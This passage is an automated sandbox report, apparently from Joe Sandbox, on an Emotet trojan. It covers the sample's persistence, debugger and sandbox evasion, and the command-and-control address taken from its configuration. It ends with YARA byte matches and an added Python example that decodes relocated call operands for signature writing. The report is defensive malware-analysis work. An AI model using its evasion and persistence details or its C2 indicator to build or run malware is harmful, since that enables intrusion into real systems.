Source: C:\Users\user\Desktop\m5wpHJDhIl.exe | Code function: 1_2_0075FD52 push edx; iretd (1_2_0075FD70)

Persistence and Installation Behavior:

Drops executables to the windows directory (C:\Windows) and starts them
Source: C:\Windows\SysWOW64\wrapgroup.exe | Executable created and started: C:\Windows\SysWOW64\wrapgroup.exe
Drops PE files to the windows directory (C:\Windows)
Source: C:\Users\user\Desktop\m5wpHJDhIl.exe | PE file moved: C:\Windows\SysWOW64\wrapgroup.exe

Boot Survival:

Contains functionality to start windows services
Source: C:\Users\user\Desktop\m5wpHJDhIl.exe | Code function: 1_2_0211E138 OpenSCManagerW,_snwprintf,CreateServiceW,OpenServiceW,ChangeServiceConfig2W,StartServiceW,CloseServiceHandle,CloseServiceHandle (1_2_0211E138)

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Users\user\Desktop\m5wpHJDhIl.exe | File opened: C:\Windows\SysWOW64\wrapgroup.exe:Zone.Identifier (read attributes | delete)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Source: C:\Users\user\Desktop\m5wpHJDhIl.exe | Code function: 0_2_004051C7 IsIconic,GetWindowPlacement,GetWindowRect (0_2_004051C7)
Source: C:\Users\user\Desktop\m5wpHJDhIl.exe | Code function: 0_2_0040D85F IsWindowVisible,IsIconic (0_2_0040D85F)
Source: C:\Users\user\Desktop\m5wpHJDhIl.exe | Code function: 0_2_00404D01 GetParent,GetParent,IsIconic,GetParent (0_2_00404D01)
Source: C:\Users\user\Desktop\m5wpHJDhIl.exe | Code function: 0_2_00417FD6 __ehhandler$?_Init@?$_Mpunct@_W@std@@IAEXABV_Locinfo@2@@Z,__EH_prolog3,IsIconic,SetForegroundWindow,SendMessageA,PostMessageA (0_2_00417FD6)
Source: C:\Users\user\Desktop\m5wpHJDhIl.exe | Code function: 1_2_004051C7 IsIconic,GetWindowPlacement,GetWindowRect (1_2_004051C7)
Source: C:\Users\user\Desktop\m5wpHJDhIl.exe | Code function: 1_2_0040D85F IsWindowVisible,IsIconic (1_2_0040D85F)
Source: C:\Users\user\Desktop\m5wpHJDhIl.exe | Code function: 1_2_00404D01 GetParent,GetParent,IsIconic,GetParent (1_2_00404D01)
Source: C:\Users\user\Desktop\m5wpHJDhIl.exe | Code function: 1_2_00417FD6 __ehhandler$?_Init@?$_Mpunct@_W@std@@IAEXABV_Locinfo@2@@Z,__EH_prolog3,IsIconic,SetForegroundWindow,SendMessageA,PostMessageA (1_2_00417FD6)
Disables application error messages (SetErrorMode)
Source: C:\Users\user\Desktop\m5wpHJDhIl.exe | Process information set: NOOPENFILEERRORBOX (4 occurrences)
Source: C:\Windows\SysWOW64\wrapgroup.exe | Process information set: NOOPENFILEERRORBOX (6 occurrences)

Malware Analysis System Evasion:

Found evasive API chain (may stop execution after checking mutex)
Source: C:\Windows\SysWOW64\wrapgroup.exe | Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess (graph_5-2234)
Source: C:\Users\user\Desktop\m5wpHJDhIl.exe | Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess (graph_1-30559)
Contains functionality to enumerate running services
Source: C:\Users\user\Desktop\m5wpHJDhIl.exe | Code function: EnumServicesStatusExW,GetLastError,EnumServicesStatusExW,GetTickCount,OpenServiceW,QueryServiceConfig2W,GetLastError,QueryServiceConfig2W,CloseServiceHandle (1_2_0211DE9C)
Source: C:\Windows\SysWOW64\wrapgroup.exe | Code function: EnumServicesStatusExW,GetLastError,EnumServicesStatusExW,GetTickCount,OpenServiceW,QueryServiceConfig2W,GetLastError,QueryServiceConfig2W,CloseServiceHandle (6_2_00F2DE9C)
Found evasive API chain (may stop execution after checking a module file name)
Source: C:\Users\user\Desktop\m5wpHJDhIl.exe | Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep (graph_0-30808)
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\m5wpHJDhIl.exe | API coverage: 6.1 %
Source: C:\Users\user\Desktop\m5wpHJDhIl.exe | API coverage: 9.1 %
Source: C:\Windows\SysWOW64\wrapgroup.exe | API coverage: 7.1 %
Program does not show much activity (idle)
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Checks the free space of harddrives
Source: C:\Users\user\Desktop\m5wpHJDhIl.exe | File Volume queried: C:\ FullSizeInformation
Contains functionality to enumerate / list files inside a directory
Source: C:\Users\user\Desktop\m5wpHJDhIl.exe | Code function: 0_2_004190B9 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA (0_2_004190B9)
Source: C:\Users\user\Desktop\m5wpHJDhIl.exe | Code function: 0_2_00402560 FindFirstFileA,SendMessageA,GetFullPathNameA,FindNextFileA,FindNextFileA,FindNextFileA,FindClose (0_2_00402560)
Source: C:\Users\user\Desktop\m5wpHJDhIl.exe | Code function: 0_2_00419C0B lstrlenA,FindFirstFileA,FindClose (0_2_00419C0B)
Source: C:\Users\user\Desktop\m5wpHJDhIl.exe | Code function: 1_2_004190B9 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA (1_2_004190B9)
Source: C:\Users\user\Desktop\m5wpHJDhIl.exe | Code function: 1_2_00402560 FindFirstFileA,SendMessageA,GetFullPathNameA,FindNextFileA,FindNextFileA,FindNextFileA,FindClose (1_2_00402560)
Source: C:\Users\user\Desktop\m5wpHJDhIl.exe | Code function: 1_2_00419C0B lstrlenA,FindFirstFileA,FindClose (1_2_00419C0B)
Program exit points
Source: C:\Users\user\Desktop\m5wpHJDhIl.exe | API call chain: ExitProcess graph end node (graph_0-30249)
Source: C:\Users\user\Desktop\m5wpHJDhIl.exe | API call chain: ExitProcess graph end node (graph_1-30149)
Source: C:\Users\user\Desktop\m5wpHJDhIl.exe | API call chain: ExitProcess graph end node (graph_1-30482)
Source: C:\Windows\SysWOW64\wrapgroup.exe | API call chain: ExitProcess graph end node (graph_5-2166)
Source: C:\Windows\SysWOW64\wrapgroup.exe | API call chain: ExitProcess graph end node (graph_6-2100)
Source: C:\Windows\SysWOW64\wrapgroup.exe | API call chain: ExitProcess graph end node (graph_6-2109)
Queries a list of all running processes
Source: C:\Windows\SysWOW64\wrapgroup.exe | Process information queried: ProcessInformation

Anti Debugging:

Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\m5wpHJDhIl.exe | Code function: 0_2_00421687 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess (0_2_00421687)
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\m5wpHJDhIl.exe | Code function: 0_2_0042A3CB LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer (0_2_0042A3CB)
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\m5wpHJDhIl.exe | Code function: 0_2_02261743 mov eax, dword ptr fs:[00000030h] (0_2_02261743)
Source: C:\Users\user\Desktop\m5wpHJDhIl.exe | Code function: 0_2_02260467 mov eax, dword ptr fs:[00000030h] (0_2_02260467)
Source: C:\Users\user\Desktop\m5wpHJDhIl.exe | Code function: 0_2_02260C0C mov eax, dword ptr fs:[00000030h] (0_2_02260C0C)
Source: C:\Users\user\Desktop\m5wpHJDhIl.exe | Code function: 0_2_022812CD mov eax, dword ptr fs:[00000030h] (0_2_022812CD)
Source: C:\Users\user\Desktop\m5wpHJDhIl.exe | Code function: 0_2_02281E04 mov eax, dword ptr fs:[00000030h] (0_2_02281E04)
Source: C:\Users\user\Desktop\m5wpHJDhIl.exe | Code function: 1_2_00750467 mov eax, dword ptr fs:[00000030h] (1_2_00750467)
Source: C:\Users\user\Desktop\m5wpHJDhIl.exe | Code function: 1_2_00751743 mov eax, dword ptr fs:[00000030h] (1_2_00751743)
Source: C:\Users\user\Desktop\m5wpHJDhIl.exe | Code function: 1_2_00750C0C mov eax, dword ptr fs:[00000030h] (1_2_00750C0C)
Source: C:\Users\user\Desktop\m5wpHJDhIl.exe | Code function: 1_2_021112CD mov eax, dword ptr fs:[00000030h] (1_2_021112CD)
Source: C:\Users\user\Desktop\m5wpHJDhIl.exe | Code function: 1_2_02111E04 mov eax, dword ptr fs:[00000030h] (1_2_02111E04)
Source: C:\Windows\SysWOW64\wrapgroup.exe | Code function: 5_2_00F112CD mov eax, dword ptr fs:[00000030h] (5_2_00F112CD)
Source: C:\Windows\SysWOW64\wrapgroup.exe | Code function: 5_2_00F11E04 mov eax, dword ptr fs:[00000030h] (5_2_00F11E04)
Source: C:\Windows\SysWOW64\wrapgroup.exe | Code function: 6_2_00F212CD mov eax, dword ptr fs:[00000030h] (6_2_00F212CD)
Source: C:\Windows\SysWOW64\wrapgroup.exe | Code function: 6_2_00F21E04 mov eax, dword ptr fs:[00000030h] (6_2_00F21E04)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\m5wpHJDhIl.exe | Code function: 0_2_0041D789 GetStartupInfoA,GetProcessHeap,GetProcessHeap,HeapAlloc,_fast_error_exit,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,_fast_error_exit,_fast_error_exit,__RTC_Initialize,__ioinit,__amsg_exit,GetCommandLineA,___crtGetEnvironmentStringsA,__setargv,__amsg_exit,__setenvp,__amsg_exit,__cinit,__amsg_exit,__wincmdln (0_2_0041D789)
Program does not show much activity (idle)
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Contains functionality to register its own exception handler
Source: C:\Users\user\Desktop\m5wpHJDhIl.exe | Code function: 0_2_00425C3A SetUnhandledExceptionFilter,__encode_pointer (0_2_00425C3A)
Source: C:\Users\user\Desktop\m5wpHJDhIl.exe | Code function: 0_2_00421687 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess (0_2_00421687)
Source: C:\Users\user\Desktop\m5wpHJDhIl.exe | Code function: 0_2_0041CA11 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess (0_2_0041CA11)
Source: C:\Users\user\Desktop\m5wpHJDhIl.exe | Code function: 0_2_00425C5C __decode_pointer,SetUnhandledExceptionFilter (0_2_00425C5C)
Source: C:\Users\user\Desktop\m5wpHJDhIl.exe | Code function: 0_2_00426C1A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter (0_2_00426C1A)
Source: C:\Users\user\Desktop\m5wpHJDhIl.exe | Code function: 1_2_00425C3A SetUnhandledExceptionFilter,__encode_pointer (1_2_00425C3A)
Source: C:\Users\user\Desktop\m5wpHJDhIl.exe | Code function: 1_2_00421687 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess (1_2_00421687)
Source: C:\Users\user\Desktop\m5wpHJDhIl.exe | Code function: 1_2_0041CA11 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess (1_2_0041CA11)
Source: C:\Users\user\Desktop\m5wpHJDhIl.exe | Code function: 1_2_00425C5C __decode_pointer,SetUnhandledExceptionFilter (1_2_00425C5C)
Source: C:\Users\user\Desktop\m5wpHJDhIl.exe | Code function: 1_2_00426C1A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter (1_2_00426C1A)

Language, Device and Operating System Detection:

Contains functionality to query locale information (e.g. system language)
Source: C:\Users\user\Desktop\m5wpHJDhIl.exe | Code function: GetLocaleInfoA (0_2_004291D4)
Source: C:\Users\user\Desktop\m5wpHJDhIl.exe | Code function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA (0_2_0040F581)
Source: C:\Users\user\Desktop\m5wpHJDhIl.exe | Code function: GetThreadLocale,GetLocaleInfoA,GetACP (0_2_0042ECB2)
Source: C:\Users\user\Desktop\m5wpHJDhIl.exe | Code function: GetLocaleInfoA (1_2_004291D4)
Source: C:\Users\user\Desktop\m5wpHJDhIl.exe | Code function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA (1_2_0040F581)
Source: C:\Users\user\Desktop\m5wpHJDhIl.exe | Code function: GetThreadLocale,GetLocaleInfoA,GetACP (1_2_0042ECB2)
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\m5wpHJDhIl.exe | Code function: 0_2_0042A5FF cpuid (0_2_0042A5FF)
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\m5wpHJDhIl.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\wrapgroup.exe | Queries volume information: C:\ VolumeInformation
Contains functionality to query local / system time
Source: C:\Users\user\Desktop\m5wpHJDhIl.exe | Code function: 0_2_00426893 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter (0_2_00426893)
Contains functionality to query time zone information
Source: C:\Users\user\Desktop\m5wpHJDhIl.exe | Code function: 0_2_00423068 __lock,__invoke_watson,__invoke_watson,__invoke_watson,____lc_codepage_func,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson (0_2_00423068)
Contains functionality to query windows version
Source: C:\Users\user\Desktop\m5wpHJDhIl.exe | Code function: 0_2_0040502E _memset,GetVersionExA (0_2_0040502E)
Queries the cryptographic machine GUID
Source: C:\Windows\SysWOW64\wrapgroup.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected Emotet
Source: Yara match | File source: 00000000.00000002.2102840767.0000000002260000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.2125425102.0000000000680000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.2125606910.0000000000F11000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.3815990072.0000000000F21000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.3815703856.0000000000610000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.2127467020.0000000000750000.00000040.00000001.sdmp, type: MEMORY

Malware Configuration

Threatname: Emotet

{"C2 list": ["120.150.246.241/K9czcmT3hzV"]}

Behavior Graph


Simulations

Behavior and APIs

No simulations

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source            Detection   Scanner         Label
m5wpHJDhIl.exe    82%         Virustotal
m5wpHJDhIl.exe    81%         ReversingLabs   Win32.Trojan.Emotet
m5wpHJDhIl.exe    100%        Avira           TR/AD.Emotet.vzbjd

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source                                Detection   Scanner           Label
http://120.150.246.241/K9czcmT3hzV    0%          Avira URL Cloud   safe

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

Source / Rule (Description, Author) / Matched strings

00000000.00000002.2102840767.0000000002260000.00000040.00000001.sdmp
  Rule: JoeSecurity_Emotet (Yara detected Emotet, Joe Security)
  Rule: Emotet (Emotet Payload, kevoreilly)
    0x18ec:$snippet2: 6A 13 68 01 00 01 00 FF 15 D8 1B 41 00 85 C0
    0x59a5:$snippet6: 33 C0 21 05 0C 3C 41 00 A3 08 3C 41 00 39 05 60 03 41 00 74 18 40 A3 08 3C 41 00 83 3C C5 60 03 ...

00000005.00000002.2125425102.0000000000680000.00000040.00000001.sdmp
  Rule: JoeSecurity_Emotet (Yara detected Emotet, Joe Security)
  Rule: Emotet (Emotet Payload, kevoreilly)
    0x18ec:$snippet2: 6A 13 68 01 00 01 00 FF 15 D8 1B 41 00 85 C0
    0x59a5:$snippet6: 33 C0 21 05 0C 3C 41 00 A3 08 3C 41 00 39 05 60 03 41 00 74 18 40 A3 08 3C 41 00 83 3C C5 60 03 ...

00000005.00000002.2125606910.0000000000F11000.00000020.00000001.sdmp
  Rule: JoeSecurity_Emotet (Yara detected Emotet, Joe Security)
  Rule: Emotet (Emotet Payload, kevoreilly)
    0xfad:$snippet2: 6A 13 68 01 00 01 00 FF 15 D8 1B F2 00 85 C0
    0x5066:$snippet6: 33 C0 21 05 0C 3C F2 00 A3 08 3C F2 00 39 05 60 03 F2 00 74 18 40 A3 08 3C F2 00 83 3C C5 60 03 ...

00000001.00000002.2127695275.0000000002111000.00000020.00000001.sdmp
  Rule: Emotet (Emotet Payload, kevoreilly)
    0xfad:$snippet2: 6A 13 68 01 00 01 00 FF 15 D8 1B 12 02 85 C0
    0x5066:$snippet6: 33 C0 21 05 0C 3C 12 02 A3 08 3C 12 02 39 05 60 03 12 02 74 18 40 A3 08 3C 12 02 83 3C C5 60 03 ...

00000006.00000002.3815990072.0000000000F21000.00000020.00000001.sdmp
  Rule: JoeSecurity_Emotet (Yara detected Emotet, Joe Security)
  Rule: Emotet (Emotet Payload, kevoreilly)
    0xfad:$snippet2: 6A 13 68 01 00 01 00 FF 15 D8 1B F3 00 85 C0
    0x5066:$snippet6: 33 C0 21 05 0C 3C F3 00 A3 08 3C F3 00 39 05 60 03 F3 00 74 18 40 A3 08 3C F3 00 83 3C C5 60 03 ...

00000006.00000002.3815703856.0000000000610000.00000040.00000001.sdmp
  Rule: JoeSecurity_Emotet (Yara detected Emotet, Joe Security)
  Rule: Emotet (Emotet Payload, kevoreilly)
    0x18ec:$snippet2: 6A 13 68 01 00 01 00 FF 15 D8 1B 41 00 85 C0
    0x59a5:$snippet6: 33 C0 21 05 0C 3C 41 00 A3 08 3C 41 00 39 05 60 03 41 00 74 18 40 A3 08 3C 41 00 83 3C C5 60 03 ...

00000000.00000002.2102869064.0000000002281000.00000020.00000001.sdmp
  Rule: Emotet (Emotet Payload, kevoreilly)
    0xfad:$snippet2: 6A 13 68 01 00 01 00 FF 15 D8 1B 29 02 85 C0
    0x5066:$snippet6: 33 C0 21 05 0C 3C 29 02 A3 08 3C 29 02 39 05 60 03 29 02 74 18 40 A3 08 3C 29 02 83 3C C5 60 03 ...

00000001.00000002.2127467020.0000000000750000.00000040.00000001.sdmp
  Rule: JoeSecurity_Emotet (Yara detected Emotet, Joe Security)
  Rule: Emotet (Emotet Payload, kevoreilly)
    0x18ec:$snippet2: 6A 13 68 01 00 01 00 FF 15 D8 1B 41 00 85 C0
    0x59a5:$snippet6: 33 C0 21 05 0C 3C 41 00 A3 08 3C 41 00 39 05 60 03 41 00 74 18 40 A3 08 3C 41 00 83 3C C5 60 03 ...
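The $snippet2 rows above are identical except for the four bytes after FF 15, which are the absolute address operand of `call dword ptr [imm32]`; they change because each copy of the payload was mapped at a different image base (41 00 for the copies still at the file's preferred base, F2 00 / 12 02 / F3 00 / 29 02 for the relocated in-place copies). The Python below is an added example, not code from the Joe Sandbox report, the sample, or the CAPE Emotet rule: it matches a wildcarded form of the snippet against all eight rows and decodes the operand, showing that every copy calls through the same RVA. The wildcard pattern is written here for illustration (the rule's exact text is not on the page), and the per-dump image bases are an assumption inferred from the dump start addresses.

```python
"""Relocation-tolerant byte matching across the memory dumps listed above.

Added example; not code from the Joe Sandbox report, the sample, or the
CAPE Emotet rule. The hex rows are copied from the report's $snippet2
matches; the wildcard pattern and the per-dump image bases are assumptions
inferred from the report (see comments).
"""
from __future__ import annotations

import re
import struct

# $snippet2 bytes as shown for each dump, keyed by the dump's start address.
SNIPPET2_HITS: dict[str, str] = {
    "0x02260000": "6A 13 68 01 00 01 00 FF 15 D8 1B 41 00 85 C0",
    "0x00680000": "6A 13 68 01 00 01 00 FF 15 D8 1B 41 00 85 C0",
    "0x00F11000": "6A 13 68 01 00 01 00 FF 15 D8 1B F2 00 85 C0",
    "0x02111000": "6A 13 68 01 00 01 00 FF 15 D8 1B 12 02 85 C0",
    "0x00F21000": "6A 13 68 01 00 01 00 FF 15 D8 1B F3 00 85 C0",
    "0x00610000": "6A 13 68 01 00 01 00 FF 15 D8 1B 41 00 85 C0",
    "0x02281000": "6A 13 68 01 00 01 00 FF 15 D8 1B 29 02 85 C0",
    "0x00750000": "6A 13 68 01 00 01 00 FF 15 D8 1B 41 00 85 C0",
}

# Wildcarded form: push 13h; push 10001h; call dword ptr [????????]; test eax,eax.
# Assumed for illustration; the real rule text is not reproduced on the page.
SNIPPET2_PATTERN = "6A 13 68 01 00 01 00 FF 15 ?? ?? ?? ?? 85 C0"

# Image base each copy was mapped at (assumption inferred from the dump
# addresses: dumps starting at ...1000 follow a PE header one page below;
# the copies that still hold 41 00 sit at the file's preferred base 0x400000).
IMAGE_BASE: dict[str, int] = {
    "0x02260000": 0x00400000, "0x00680000": 0x00400000,
    "0x00610000": 0x00400000, "0x00750000": 0x00400000,
    "0x00F11000": 0x00F10000, "0x02111000": 0x02110000,
    "0x00F21000": 0x00F20000, "0x02281000": 0x02280000,
}


def compile_hex_pattern(pattern: str) -> re.Pattern[bytes]:
    """Turn a YARA-style hex string into a bytes regex; '??' matches any byte."""
    parts = [b"." if tok == "??" else re.escape(bytes([int(tok, 16)]))
             for tok in pattern.split()]
    return re.compile(b"".join(parts), re.DOTALL)


def call_target(snippet: bytes) -> int:
    """Decode the little-endian imm32 operand of the FF 15 (call [imm32])."""
    idx = snippet.index(b"\xff\x15")
    return struct.unpack_from("<I", snippet, idx + 2)[0]


def match_all(hits: dict[str, str], pattern: str) -> dict[str, int]:
    """Dumps whose snippet matches the pattern, mapped to the decoded call target."""
    rx = compile_hex_pattern(pattern)
    return {dump: call_target(bytes.fromhex(row))
            for dump, row in hits.items() if rx.search(bytes.fromhex(row))}


def rvas(hits: dict[str, str], pattern: str) -> dict[str, int]:
    """Call target minus image base: identical across copies if only relocation differs."""
    return {dump: target - IMAGE_BASE[dump]
            for dump, target in match_all(hits, pattern).items()}


if __name__ == "__main__":
    for dump, target in match_all(SNIPPET2_HITS, SNIPPET2_PATTERN).items():
        print(f"{dump}: call [{target:#010x}]  rva={target - IMAGE_BASE[dump]:#x}")
```

A literal pattern containing D8 1B 41 00 would have hit only the four unrelocated copies; wildcarding the imm32 is what lets one rule cover both the unpacked payload and the copies that were relocated when mapped, which is why the same rule fires on dumps at 0x...0000 and 0x...1000 alike. The same caveat applies to any rule written from a single dump: check which bytes are absolute addresses before committing them to a signature.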

Unpacked PEs

No yara matches

Sigma Overview

No Sigma rule has matched

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context
